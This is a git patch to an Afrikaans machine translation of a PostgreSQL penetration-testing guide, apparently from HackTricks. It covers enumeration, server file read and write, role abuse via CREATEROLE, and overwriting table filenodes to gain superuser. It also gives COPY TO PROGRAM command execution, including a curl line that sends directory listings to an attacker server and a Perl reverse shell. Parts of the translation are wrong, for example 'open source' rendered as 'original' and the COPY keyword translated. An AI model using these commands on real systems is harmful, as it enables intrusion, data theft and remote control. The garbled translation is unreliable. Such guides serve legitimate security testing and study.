From d1fd35e7a1c9ca71e6ffbaa4990043b3cd4467db Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 14 Feb 2024 10:07:27 +0000 Subject: [PATCH] Translated ['network-services-pentesting/pentesting-postgresql.md'] to a --- .../pentesting-postgresql.md | 630 +++++++----------- 1 file changed, 257 insertions(+), 373 deletions(-) diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index e0cc792f0..93e098117 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -3,58 +3,35 @@
\ -Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ -Kry vandag toegang: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\ +Kry Toegang Vandag: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: -* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag. +* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## **Basiese Inligting** -**PostgreSQL** word beskryf as 'n **objek-verwantskaplike databasisstelsel** wat **oopbron** is. Hierdie stelsel maak nie net gebruik van die SQL-taal nie, maar verbeter dit ook met addisionele funksies. Sy vermoëns stel dit in staat om 'n wye verskeidenheid data-tipes en operasies te hanteer, wat dit 'n veelsydige keuse maak vir ontwikkelaars en organisasies. +**PostgreSQL** word beskryf as 'n **objek-relasionele databasisstelsel** wat **oorspronklik** is. Hierdie stelsel maak nie net gebruik van die SQL-taal nie, maar verbeter dit ook met addisionele kenmerke. Sy vermoëns stel dit in staat om 'n wye verskeidenheid data-tipes en operasies te hanteer, wat dit 'n veelsydige keuse maak vir ontwikkelaars en organisasies. -**Verstekpoort:** 5432, en as hierdie poort reeds in gebruik is, lyk dit asof postgresql die volgende poort (waarskynlik 5433) sal gebruik wat nie in gebruik is nie. +**Verstekpoort:** 5432, en as hierdie poort reeds in gebruik is, lyk dit asof postgresql die volgende poort sal gebruik (waarskynlik 5433) wat nie in gebruik is nie. ``` PORT STATE SERVICE 5432/tcp open pgsql ``` -## Koppel & Basiese Enum - -### Connect - -Om te begin, moet jy 'n verbinding maak met die PostgreSQL-diens. Jy kan dit doen deur die `psql`-opdrag te gebruik: - -```bash -psql -h -p -U -d -``` - -Vervang `` met die IP-adres of die DNS-naam van die PostgreSQL-diens, `` met die poortnommer (standaard is 5432), `` met die gebruikersnaam en `` met die databasenaam. - -As jy suksesvol gekoppel het, sal jy 'n `psql`-opdraglyn sien wat aandui dat jy met die PostgreSQL-diens geassosieer is. - -### Basiese Enumerasie - -Nadat jy suksesvol gekoppel het, kan jy begin met basiese enumerasie van die PostgreSQL-diens. Hier is 'n paar nuttige opdragte: - -- `\l`: Lys alle databasisse in die PostgreSQL-diens. -- `\dt`: Lys alle tabelle in die huidige databasis. -- `\du`: Lys alle gebruikers in die PostgreSQL-diens. -- `\dp`: Lys die toegangsregte vir die tabelle in die huidige databasis. - -Hierdie opdragte sal jou help om 'n beter begrip van die PostgreSQL-diens te kry en om potensiële aanvalsoppervlaktes te identifiseer. +## Verbind & Basiese Enum ```bash psql -U # Open psql console with user psql -h -U -d # Remote connection @@ -95,25 +72,25 @@ SELECT * FROM pg_extension; \s ``` {% hint style="warning" %} -As jy **`\list`** uitvoer en 'n databasis met die naam **`rdsadmin`** vind, weet jy dat jy binne 'n **AWS postgresql databasis** is. +As jy **`\list`** hardloop en 'n databasis genaamd **`rdsadmin`** vind, weet jy dat jy binne 'n **AWS PostgreSQL-databasis** is. {% endhint %} -Vir meer inligting oor **hoe om 'n PostgreSQL databasis te misbruik**, kyk: +Vir meer inligting oor **hoe om 'n PostgreSQL-databasis te misbruik** kyk: {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} [postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/) {% endcontent-ref %} -## Outomatiese Enumerasie +## Outomatiese Opsomming ``` msf> use auxiliary/scanner/postgres/postgres_version msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection ``` ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#postgresql) -### **Poortskandering** +### **Poort skandering** -Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection`-uitsondering wanneer 'n verbindingspoging misluk, met 'n verduideliking van die fout. Voorbeelde van hierdie besonderhede word hieronder gelys. +Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), wanneer 'n verbindingspoging misluk, gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection`-uitsondering wat 'n verduideliking van die fout insluit. Voorbeelde van hierdie besonderhede word hieronder gelys. ```sql SELECT * FROM dblink_connect('host=1.2.3.4 port=5678 @@ -124,7 +101,7 @@ connect_timeout=10'); ``` * Gasheer is af -`DETAIL: kon nie aan die bediener koppel: Geen roete na gasheer. Is die bediener aan die gang op gasheer "1.2.3.4" en aanvaar dit TCP/IP-koppelinge op poort 5678?` +`DETAIL: kon nie aan die bediener koppel nie: Geen roete na gasheer Is die bediener aan die hardloop op gasheer "1.2.3.4" en aanvaar dit TCP/IP-koppeling op poort 5678?` * Poort is toe ``` @@ -136,146 +113,35 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? DETAIL: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request ``` -of +### PostgreSQL Pentesting ---- +#### PostgreSQL Enumeration -### PostgreSQL +PostgreSQL kan geënumereer word deur die volgende stappe te volg: -#### Enumeration +1. **Port Scanning**: Skandeer vir die PostgreSQL-diens op die bedryf se poorte. +2. **Banner Grabbing**: Verkryg inligting oor die PostgreSQL-diens deur die banier te gryp. +3. **Version Detection**: Identifiseer die weergawe van die PostgreSQL-diens. +4. **User Enumeration**: Identifiseer geldige gebruikers in die PostgreSQL-databasis. +5. **Database Enumeration**: Identifiseer die databasisse wat beskikbaar is op die PostgreSQL-diens. -##### Version +#### PostgreSQL Exploitation -To obtain the version of the PostgreSQL server, you can use the following SQL query: +PostgreSQL kan geëxploiteer word deur die volgende metodes: -```sql -SELECT version(); -``` +1. **Brute Force**: Voer 'n aanval uit om die wagwoorde van PostgreSQL-gebruikers te agterhaal. +2. **SQL Injection**: Benut SQL-injeksiekwessies om toegang tot die databasis te verkry. +3. **File Inclusion**: Exploiteer lêerinsluitingskwessies om die PostgreSQL-diens te kompromiteer. +4. **Privilege Escalation**: Identifiseer en benut priviligie-ontsnappingskwessies om hoër toegangsniveaus te verkry. -##### List Databases +#### PostgreSQL Post-Exploitation -To list all the databases in the PostgreSQL server, you can use the following SQL query: +Na die suksesvolle uitbuiting van PostgreSQL, kan die aanvaller die volgende aksies onderneem: -```sql -SELECT datname FROM pg_database; -``` - -##### List Users - -To list all the users in the PostgreSQL server, you can use the following SQL query: - -```sql -SELECT usename FROM pg_user; -``` - -##### List Tables - -To list all the tables in a specific database, you can use the following SQL query: - -```sql -SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'; -``` - -##### List Columns - -To list all the columns in a specific table, you can use the following SQL query: - -```sql -SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'; -``` - -##### List Functions - -To list all the functions in a specific database, you can use the following SQL query: - -```sql -SELECT proname FROM pg_proc; -``` - -##### List Triggers - -To list all the triggers in a specific database, you can use the following SQL query: - -```sql -SELECT tgname FROM pg_trigger; -``` - -##### List Views - -To list all the views in a specific database, you can use the following SQL query: - -```sql -SELECT viewname FROM pg_views; -``` - -##### List Indexes - -To list all the indexes in a specific database, you can use the following SQL query: - -```sql -SELECT indexname FROM pg_indexes; -``` - -##### List Constraints - -To list all the constraints in a specific database, you can use the following SQL query: - -```sql -SELECT conname FROM pg_constraint; -``` - -##### List Extensions - -To list all the extensions in a specific database, you can use the following SQL query: - -```sql -SELECT extname FROM pg_extension; -``` - -#### Exploitation - -##### Default Credentials - -PostgreSQL does not have default credentials. However, it is common for users to set weak or easily guessable passwords. Therefore, it is recommended to perform password guessing attacks using tools like Hydra or Medusa. - -##### SQL Injection - -PostgreSQL is vulnerable to SQL injection attacks. You can exploit this vulnerability by injecting malicious SQL queries into user input fields or by manipulating the SQL queries sent to the server. - -##### Privilege Escalation - -To escalate privileges in PostgreSQL, you can try the following techniques: - -- Exploiting misconfigured permissions: Check if any user has excessive privileges or if there are any misconfigured roles. -- Exploiting vulnerabilities: Look for known vulnerabilities in the version of PostgreSQL being used. -- Exploiting weak passwords: Try to crack weak passwords or use password reuse attacks. - -##### Remote Code Execution - -To achieve remote code execution in PostgreSQL, you can try the following techniques: - -- Exploiting SQL injection vulnerabilities: Inject malicious SQL queries that execute arbitrary commands on the server. -- Exploiting command execution vulnerabilities: Look for vulnerabilities that allow executing commands on the underlying operating system. - -##### Data Exfiltration - -To exfiltrate data from a PostgreSQL server, you can use techniques such as: - -- Dumping the database: Use the `pg_dump` command to create a backup of the entire database. -- Extracting specific data: Write SQL queries to extract specific data from the database and save it to a file or send it to a remote server. - -##### Password Cracking - -If you have obtained a password hash from the PostgreSQL server, you can try to crack it using tools like John the Ripper or Hashcat. - -##### Post-Exploitation - -After gaining access to a PostgreSQL server, you can perform various post-exploitation activities, such as: - -- Privilege escalation: Look for ways to escalate privileges within the server or the underlying operating system. -- Persistence: Install backdoors or create new user accounts to maintain access to the server. -- Data manipulation: Modify or delete data in the database. -- Covering tracks: Delete logs or modify timestamps to hide your activities. +1. **Data Extraction**: Steel sensitiwiteitsdata uit die PostgreSQL-databasis. +2. **Persistence**: Stel volhoubaarheid in om toegang tot die PostgreSQL-diens te behou. +3. **Covering Tracks**: Verwyder enige spore van die aanval om opsporing te voorkom. +4. **Privilege Escalation**: Verhoog toegangsniveaus binne die PostgreSQL-omgewing. ``` DETAIL: FATAL: password authentication failed for user "name" ``` @@ -284,26 +150,26 @@ DETAIL: FATAL: password authentication failed for user "name" DETAIL: could not connect to server: Connection timed out Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` -In PL/pgSQL funksies is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. As jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting herwin. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelys-aanvalsmetode te gebruik wat bespreek is in die vorige afdeling, aangesien dit moontlik positiewe resultate kan oplewer. +In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. Indien jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting terugkry. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelysaanvalmetode te gebruik wat bespreek word in die vorige afdeling, aangesien dit moontlik positiewe resultate kan oplewer. -## Opname van Voorregte +## Enumerasie van Voorregte ### Rolle | Rol Tipes | | | -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- | -| rolsuper | Rol het supergebruiker-voorregte | -| rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is | -| rolcreaterole | Rol kan meer rolle skep | -| rolcreatedb | Rol kan databasisse skep | -| rolcanlogin | Rol kan inteken. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word | -| rolreplication | Rol is 'n replikasie-rol. 'n Replikasie-rol kan replikasieverbindinge inisieer en replikasiegleuwe skep en laat val | -| rolconnlimit | Vir rolle wat kan inteken, stel dit die maksimum aantal gelyktydige verbindings in wat hierdie rol kan maak. -1 beteken geen limiet nie | -| rolpassword | Nie die wagwoord (lees altyd as `********`) | -| rolvaliduntil | Wagwoord vervaltyd (slegs gebruik vir wagwoord-verifikasie); nul indien geen vervaltyd | -| rolbypassrls | Rol omseil elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting. | -| rolconfig | Rol-spesifieke verstekwaardes vir uitvoertyd-konfigurasie-veranderlikes | -| oid | ID van rol | +| rolsuper | Rol het supergebruiker-voorregte | +| rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is | +| rolcreaterole | Rol kan meer rolle skep | +| rolcreatedb | Rol kan databasisse skep | +| rolcanlogin | Rol kan aanmeld. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word | +| rolreplication | Rol is 'n replikasie rol. 'n Replikasie rol kan replikasieverbindinge inisieer en replikasieslotte skep en verwyder. | +| rolconnlimit | Vir rolle wat kan aanmeld, stel dit die maksimum aantal gelyktydige verbindinge in wat hierdie rol kan maak. -1 beteken geen limiet. | +| rolpassword | Nie die wagwoord (lees altyd as `********`) | +| rolvaliduntil | Wagwoordvervaltyd (slegs gebruik vir wagwoordverifikasie); nul indien geen verval | +| rolbypassrls | Rol verbygaan elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting. | +| rolconfig | Rol-spesifieke verstekwaardes vir hardlooptydkonfigurasie-veranderlikes | +| oid | ID van rol | #### Interessante Groepe @@ -312,7 +178,7 @@ In PL/pgSQL funksies is dit tans nie moontlik om uitsonderingsbesonderhede te ve * As jy 'n lid is van **`pg_write_server_files`** kan jy **lêers skryf** {% hint style="info" %} -Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om in te teken. +Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om aan te meld. {% endhint %} ```sql # Get users roles @@ -358,50 +224,6 @@ CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files; ## Cannot GRANT on the "pg_read_server_files" role without being a member of the role. ``` ### Tabelle - -In PostgreSQL, tables are used to store data in a structured manner. Each table consists of columns and rows, where columns represent the different attributes or fields of the data, and rows represent individual records or instances of the data. - -To create a table in PostgreSQL, you can use the `CREATE TABLE` statement followed by the table name and the column definitions. The column definitions specify the name, data type, and any constraints for each column. - -Here is an example of creating a table called `users` with three columns: `id`, `name`, and `email`: - -```sql -CREATE TABLE users ( - id SERIAL PRIMARY KEY, - name VARCHAR(50) NOT NULL, - email VARCHAR(100) UNIQUE -); -``` - -In this example, the `id` column is defined as a `SERIAL` data type, which automatically generates a unique value for each new row. The `PRIMARY KEY` constraint ensures that the `id` column is unique and serves as the primary key for the table. - -The `name` column is defined as a `VARCHAR(50)` data type, which can store up to 50 characters. The `NOT NULL` constraint ensures that the `name` column cannot be empty. - -The `email` column is defined as a `VARCHAR(100)` data type and has a `UNIQUE` constraint, which ensures that each email address in the table is unique. - -Once the table is created, you can insert data into it using the `INSERT INTO` statement, query the data using the `SELECT` statement, update the data using the `UPDATE` statement, and delete the data using the `DELETE` statement. - -To view the structure of a table, you can use the `\d` command in the PostgreSQL command-line interface. For example, `\d users` will display the column names, data types, and constraints of the `users` table. - -```sql -\d users -``` - -This will show the following output: - -``` - Table "public.users" - Column | Type | Modifiers ---------+-----------------------+----------- - id | integer | not null - name | character varying(50) | not null - email | character varying(100)| -Indexes: - "users_pkey" PRIMARY KEY, btree (id) - "users_email_key" UNIQUE CONSTRAINT, btree (email) -``` - -This output provides information about the columns, their data types, and any constraints or indexes associated with the table. ```sql # Get owners of tables select schemaname,tablename,tableowner from pg_tables; @@ -416,67 +238,6 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'; ``` ### Funksies - -Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc. - -Funksies in PostgreSQL is benoemde blokke kode wat uitgevoer kan word deur hul naam te roep. Hulle word gebruik om spesifieke take uit te voer en kan parameters aanvaar en waardes teruggee. Funksies kan geskep word deur die `CREATE FUNCTION` verklaring te gebruik en kan geskryf word in verskeie programmeer tale soos SQL, PL/pgSQL, Python, ens. - -#### Creating Functions - -#### Funksies Skep - -To create a function in PostgreSQL, you can use the `CREATE FUNCTION` statement followed by the function name, input parameters (if any), return type, and the code block enclosed in a `BEGIN` and `END` block. Here is the syntax: - -Om 'n funksie in PostgreSQL te skep, kan jy die `CREATE FUNCTION` verklaring gebruik gevolg deur die funksie naam, insetparameters (indien enige), terugkeer tipe, en die kodeblok wat ingesluit is in 'n `BEGIN` en `END` blok. Hier is die sintaksis: - -```sql -CREATE FUNCTION function_name (input_parameters) - RETURNS return_type - LANGUAGE language_name -AS $$ - -- Function code here -$$; -``` - -#### Calling Functions - -#### Funksies Roep - -Once a function is created, it can be called using the `SELECT` statement or as part of another SQL statement. To call a function, you need to specify the function name followed by the input parameters (if any) enclosed in parentheses. Here is an example: - -Sodra 'n funksie geskep is, kan dit geroep word deur die `SELECT` verklaring te gebruik of as deel van 'n ander SQL-verklaring. Om 'n funksie te roep, moet jy die funksie naam spesifiseer gevolg deur die insetparameters (indien enige) wat ingesluit is in hakies. Hier is 'n voorbeeld: - -```sql -SELECT function_name(input_parameters); -``` - -#### Returning Values - -#### Waardes Teruggee - -Functions in PostgreSQL can return values using the `RETURN` statement. The return type of the function should match the specified return type in the function definition. Here is an example of a function that returns an integer: - -Funksies in PostgreSQL kan waardes teruggee deur die `RETURN` verklaring te gebruik. Die terugkeer tipe van die funksie moet ooreenstem met die gespesifiseerde terugkeer tipe in die funksie definisie. Hier is 'n voorbeeld van 'n funksie wat 'n heelgetal teruggee: - -```sql -CREATE FUNCTION add_numbers(a integer, b integer) - RETURNS integer -AS $$ - BEGIN - RETURN a + b; - END; -$$; - -SELECT add_numbers(5, 10); -- Returns 15 -``` - -#### Conclusion - -#### Gevolgtrekking - -Functions in PostgreSQL are powerful tools that allow you to encapsulate reusable code and perform specific tasks. By creating and calling functions, you can enhance the functionality and flexibility of your PostgreSQL database. - -Funksies in PostgreSQL is kragtige hulpmiddels wat jou in staat stel om herbruikbare kode te inkapsuleer en spesifieke take uit te voer. Deur funksies te skep en te roep, kan jy die funksionaliteit en buigsaamheid van jou PostgreSQL databasis verbeter. ```sql # Interesting functions are inside pg_catalog \df * #Get all @@ -496,9 +257,9 @@ ORDER BY routines.routine_name, parameters.ordinal_position; # Another aparent option SELECT * FROM pg_proc; ``` -## Lêerstelsel aksies +## Lêerstelselaksies -### Lees gidslys en lêers +### Lees gids en lêers Vanaf hierdie [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) kan lede van die gedefinieerde **`DEFAULT_ROLE_READ_SERVER_FILES`** groep (genaamd **`pg_read_server_files`**) en **supergebruikers** die **`COPY`** metode gebruik op enige pad (kyk na `convert_and_check_filename` in `genfile.c`): ```sql @@ -515,7 +276,7 @@ GRANT pg_read_server_files TO username; [**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Daar is **ander postgres funksies** wat gebruik kan word om **lêers te lees of 'n gids te lys**. Slegs **supergebruikers** en **gebruikers met uitdruklike toestemmings** kan dit gebruik: +Daar is **ander postgres-funksies** wat gebruik kan word om **'n lêer te lees of 'n gids te lys**. Slegs **supergebruikers** en **gebruikers met uitdruklike toestemmings** kan hulle gebruik: ```sql # Before executing these function go to the postgres DB (not in the template1) \c postgres @@ -541,7 +302,7 @@ GRANT pg_read_server_files TO username; ``` Jy kan **meer funksies** vind by [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) -### Eenvoudige Lêerskryf +### Eenvoudige Lêer Skryf Slegs **super gebruikers** en lede van **`pg_write_server_files`** kan `copy` gebruik om lêers te skryf. @@ -552,18 +313,18 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju {% endcode %} {% hint style="warning" %} -Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** +Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-permissies het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_write_server_files TO username; ``` [**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Onthou dat COPY geen newline karakters kan hanteer nie, daarom moet jy selfs as jy 'n base64 payload gebruik, 'n eenreëler stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig. +Onthou dat KOPIE nie nuwe lynkarakters kan hanteer nie, daarom moet jy selfs as jy 'n base64-lading gebruik 'n eenlynstuk stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig. -### **Oplaai van binêre lêers** +### Oplaai van binêre lêers -Daar is egter **ander tegnieke om groot binêre lêers op te laai:** +Daar is egter ander tegnieke om groot binêre lêers op te laai: {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} [big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md) @@ -571,15 +332,76 @@ Daar is egter **ander tegnieke om groot binêre lêers op te laai:** ## -**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers!** Sluit vandag nog by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) vandag, en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} +### Opdatering van PostgreSQL tabeldata via plaaslike lêerskryf +As jy die nodige regte het om PostgreSQL-bedienerlêers te lees en te skryf, kan jy enige tabel op die bediener opdateer deur die geassosieerde lêernode in [die PostgreSQL-datagids](https://www.postgresql.org/docs/8.1/storage.html) te oorskryf. +Meer oor hierdie tegniek [hier](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users). + +Vereiste stappe: +1. Kry die PostgreSQL-datagids +```sql +SELECT setting FROM pg_settings WHERE name = 'data_directory'; +``` + +**Nota:** As jy nie die huidige datagidsbaan uit instellings kan kry nie, kan jy die hoof PostgreSQL-weergawe deur die `SELECT version()`-navraag kry en probeer om die baan met geweld te vind. Gewone datagidsbane op Unix-installasies van PostgreSQL is `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. 'n Gewone klasternaam is `main`. + +2. Kry 'n relatiewe pad na die lêernode wat met die teikentabel geassosieer is +```sql +SELECT pg_relation_filepath('{TABLE_NAME}') +``` +Hierdie navraag behoort iets soos `base/3/1337` terug te gee. Die volledige pad op skyf sal wees `$DATA_DIRECTORY/base/3/1337`, m.a.w. `/var/lib/postgresql/13/main/base/3/1337`. + +3. Laai die lêernode af deur die `lo_*`-funksies +```sql +SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337) +``` +4. Kry die datatipe wat met die teikentabel geassosieer is +```sql +SELECT +STRING_AGG( +CONCAT_WS( +',', +attname, +typname, +attlen, +attalign +), +';' +) +FROM pg_attribute +JOIN pg_type +ON pg_attribute.atttypid = pg_type.oid +JOIN pg_class +ON pg_attribute.attrelid = pg_class.oid +WHERE pg_class.relname = '{TABLE_NAME}'; +``` +5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om [die lêernode te wysig](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users); stel alle `rol*` booleaanse vlae op 1 vir volle regte. +```bash +python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA} +``` +![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif) +7. Laai die gewysigde lêernode weer op deur die `lo_*`-funksies, en oorskryf die oorspronklike lêer op die skyf +```sql +SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64')) +SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}') +``` +8. *(Opsioneel)* Maak die in-memory tabelkassie skoon deur 'n duur SQL-navraag uit te voer +```sql +SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea) +``` +9. Jy behoort nou opgedateerde tabelwaardes in die PostgreSQL te sien. + +Jy kan ook 'n superadmin word deur die `pg_authid`-tabel te wysig. **Sien [die volgende afdeling](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)**. + + ## RCE ### **RCE na program** -Sedert [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html) kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** copy gebruik vir RCE (voorbeeld met eksfiltrering: +Vanaf [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html) kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** kopie vir RCE gebruik (voorbeeld met uitlekking: ```sql '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- - ``` @@ -597,7 +419,7 @@ DROP TABLE IF EXISTS cmd_exec; COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; ``` {% hint style="warning" %} -Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** +Onthou dat as jy nie 'n supergebruiker is nie, maar wel die **`CREATEROLE`**-permissies het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_execute_server_program TO username; ``` @@ -605,9 +427,9 @@ GRANT pg_execute_server_program TO username; {% endhint %} Of gebruik die `multi/postgres/postgres_copy_from_program_cmd_exec` module van **metasploit**.\ -Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 aangemeld is, het Postges verklaar dat dit 'n [kenmerk is en nie reggemaak sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). +Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 gerapporteer is, het Postges verklaar dat dit 'n [kenmerk is en nie reggestel sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). -### RCE met PostgreSQL-tale +### RCE met PostgreSQL Tale {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} [rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md) @@ -615,15 +437,18 @@ Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf- ### RCE met PostgreSQL-uitbreidings -Sodra jy **geleer** het van die vorige pos **hoe om binêre lêers op te laai**, kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**. +Nadat jy uit die vorige pos geleer het **hoe om binêre lêers te oplaai**, kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**. {% content-ref 